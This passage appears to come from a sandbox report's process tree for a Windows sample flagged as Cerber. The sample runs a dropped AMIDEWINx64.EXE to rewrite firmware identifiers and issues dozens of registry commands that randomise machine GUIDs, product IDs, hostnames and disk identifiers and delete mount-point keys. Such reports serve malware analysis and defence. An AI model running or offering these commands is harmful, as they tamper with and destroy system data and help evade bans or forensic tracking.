    PID:1184
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /SU AUTO
      4⤵
      Cerber
      Executes dropped EXE
      PID:3784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /SK %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:1264
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /SK 19240878324885
    3⤵
    PID:4260
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /SK 19240878324885
      4⤵
      Cerber
      Executes dropped EXE
      PID:1044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /SF %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:1464
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /SF 19240878324885
    3⤵
    PID:3868
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /SF 19240878324885
      4⤵
      Executes dropped EXE
      PID:3660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /BM %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:4280
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /BM 19240878324885
    3⤵
    PID:2724
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /BM 19240878324885
      4⤵
      Cerber
      Executes dropped EXE
      PID:2488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /BP %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:4944
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /BP 19240878324885
    3⤵
    PID:60
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /BP 19240878324885
      4⤵
      Cerber
      Executes dropped EXE
      PID:4564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /BV %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:3632
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /BV 19240878324885
    3⤵
    PID:3292
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /BV 19240878324885
      4⤵
      Cerber
      Executes dropped EXE
      PID:1012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /BS %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:64
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /BS 19243195329981
    3⤵
    PID:5024
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /BS 19243195329981
      4⤵
      Cerber
      Executes dropped EXE
      PID:1160
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /BT %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:3496
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /BT 19243195329981
    3⤵
    PID:4352
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /BT 19243195329981
      4⤵
      Cerber
      Executes dropped EXE
      PID:3924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /BLC %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:2120
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /BLC 19243195329981
    3⤵
    PID:5048
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /BLC 19243195329981
      4⤵
      Cerber
      Executes dropped EXE
      PID:1144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /CM %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:3844
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /CM 19243195329981
    3⤵
    PID:2772
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /CM 19243195329981
      4⤵
      Cerber
      PID:1284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /CV %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:3952
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /CV 19243195329981
    3⤵
    PID:1412
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /CV 19243195329981
      4⤵
      Cerber
      PID:1700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /CS %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:4824
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /CS 19243195329981
    3⤵
    PID:3308
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /CS 19243195329981
      4⤵
      Cerber
      PID:740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /CA %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:796
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /CA 192463028027845
    3⤵
    PID:3436
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /CA 192463028027845
      4⤵
      Cerber
      PID:1000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /CSK %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:3004
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /CSK 192463028027845
    3⤵
    PID:3064
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /CSK 192463028027845
      4⤵
      Cerber
      PID:4576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /PSN %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:4580
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /PSN 192463028027845
    3⤵
    PID:1480
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /PSN 192463028027845
      4⤵
      Cerber
      PID:2152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /PAT %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:4540
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /PAT 192463028027845
    3⤵
    PID:4416
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /PAT 192463028027845
      4⤵
      Cerber
      PID:2888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /PPN %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:2156
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /PPN 192463028027845
    3⤵
    PID:2104
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /PPN 192463028027845
      4⤵
      Cerber
      PID:672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d %random% /f >nul
  2⤵
  PID:2908
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d 19269 /f
    3⤵
    - Modifies registry key
    PID:2312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d %random% /f >nul
  2⤵
  PID:32
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d 19269 /f
    3⤵
    - Modifies registry key
    PID:3456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:2924
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {192697215-2182232220-1716718176} /f
    3⤵
    - Modifies registry key
    PID:1092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3536
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d 192697215-2182232220-1716718176 /f
    3⤵
    - Modifies registry key
    PID:4968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:3460
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {192697215-2182232220-1716718176} /f
    3⤵
    - Modifies registry key
    PID:2448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:656
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {192697215-2182232220-1716718176} /f
    3⤵
    - Modifies registry key
    PID:2016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3116
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d 192697215-2182232220-1716718176 /f
    3⤵
    - Modifies registry key
    PID:4272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1612
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d 192697215-2182232220-1716718176 /f
    3⤵
    - Modifies registry key
    PID:3800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2032
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d 192697215-2182232220-1716718176 /f
    3⤵
    - Modifies registry key
    PID:2064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1820
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d 192697215-2182232220-1716718176 /f
    3⤵
    - Modifies registry key
    PID:396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1856
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d 192697215-2182232220-1716718176 /f
    3⤵
    - Modifies registry key
    PID:4204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1684
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d 192697215-2182232220-1716718176 /f
    3⤵
    - Modifies registry key
    PID:5020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:5100
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d 192697215-2182232220-1716718176 /f
    3⤵
    - Modifies registry key
    PID:2992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1572
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d 1927317963-691823515-2748222102 /f
    3⤵
    - Modifies registry key
    PID:4988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3740
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d 1927317963-691823515-2748222102 /f
    3⤵
    - Modifies registry key
    PID:940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:4388
- - C:\Windows\system32\reg.exe
    reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d 1927317963-691823515-2748222102 /f
    3⤵
    - Modifies registry key
    PID:2540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1268
- - C:\Windows\system32\reg.exe
    reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d 1927317963-691823515-2748222102 /f
    3⤵
    - Modifies registry key
    PID:116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2008
- - C:\Windows\system32\reg.exe
    reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d 1927317963-691823515-2748222102 /f
    3⤵
    - Enumerates system info in registry
    - Modifies registry key
    PID:4732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2676
- - C:\Windows\system32\reg.exe
    reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d 1927317963-691823515-2748222102 /f
    3⤵
    - Enumerates system info in registry
    - Modifies registry key
    PID:2740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul >nul
  2⤵
  PID:3088
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {1927317963-691823515-2748222102} /f
    3⤵
    - Modifies registry key
    PID:4212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul >nul
  2⤵
  PID:3640
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d 1927317963-691823515-2748222102 /f
    3⤵
    - Modifies registry key
    PID:2260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul >nul
  2⤵
  PID:4804
- - C:\Windows\system32\reg.exe
    reg add HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d 1927317963-691823515-2748222102 /f
    3⤵
    - Modifies registry key
    PID:2760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d%random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:4784
- - C:\Windows\system32\reg.exe
    reg add HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d1927317963-691823515-2748222102 /f
    3⤵
    - Modifies registry key
    PID:4908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1120
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d 1927317963-691823515-2748222102 /f
    3⤵
    - Modifies registry key
    PID:1044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul >nul
  2⤵
  PID:4260
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d 1927628712-2478314811-502926029 /f
    3⤵
    - Modifies registry key
    PID:1264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul >nul
  2⤵
  PID:5060
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d 1927628712-2478314811-502926029 /f
    3⤵
    - Modifies registry key
    PID:1308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1592
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d 1927628712-2478314811-502926029 /f
    3⤵
    - Modifies registry key
    PID:5072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:4668
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d 1927628712-2478314811-502926029 /f
    3⤵
    - Modifies registry key
    PID:2668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:4648
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d 1927628712-2478314811-502926029 /f
    3⤵
    - Modifies registry key
    PID:3560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:4236
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d 1927628712-2478314811-502926029 /f
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Modifies registry key
    PID:4572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3580
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d 1927628712-2478314811-502926029 /f
    3⤵
    - Modifies registry key
    PID:1320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3160
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d 1927628712-2478314811-502926029 /f
    3⤵
    - Modifies registry key
    PID:4060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v RegisteredOwner /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3124
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v RegisteredOwner /t REG_SZ /d 1927628712-2478314811-502926029 /f
    3⤵
    - Modifies registry key
    PID:1348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v RegisteredOrganization /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1668
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v RegisteredOrganization /t REG_SZ /d 1927628712-2478314811-502926029 /f
    3⤵
    - Modifies registry key
    PID:4644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2840
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d 1927628712-2478314811-502926029 /f
    3⤵
    - Modifies registry key
    PID:784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:4076
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d 192796692-98796106-1534329956 /f
    3⤵
    - Modifies registry key
    PID:536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:908
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d 192796692-98796106-1534329956 /f
    3⤵
    - Modifies registry key
    PID:2060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:1540
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {192796692-98796106-1534329956} /f
    3⤵
    - Modifies registry key
    PID:4756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:548
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {192796692-98796106-1534329956} /f
    3⤵
    - Modifies registry key
    PID:3356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\MountedDevices /f >nul
  2⤵
  PID:2388
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\MountedDevices /f
    3⤵
    - Modifies registry key
    PID:224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f >nul
  2⤵
  PID:640
- - C:\Windows\system32\reg.exe
    reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
    3⤵
    - Modifies registry key
    PID:4324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f >nul
  2⤵
  PID:3988
- - C:\Windows\system32\reg.exe
    reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
    3⤵
    - Modifies registry key
    PID:2220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f >nul
  2⤵
  PID:1976
- - C:\Windows\system32\reg.exe
    reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
    3⤵
    - Modifies registry key
    PID:3020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f >nul
  2⤵
  PID:1468
- - C:\Windows\system32\reg.exe
    reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
    3⤵
    - Modifies registry key
    PID:1876
- C:\Windows\system32\cmd.exe
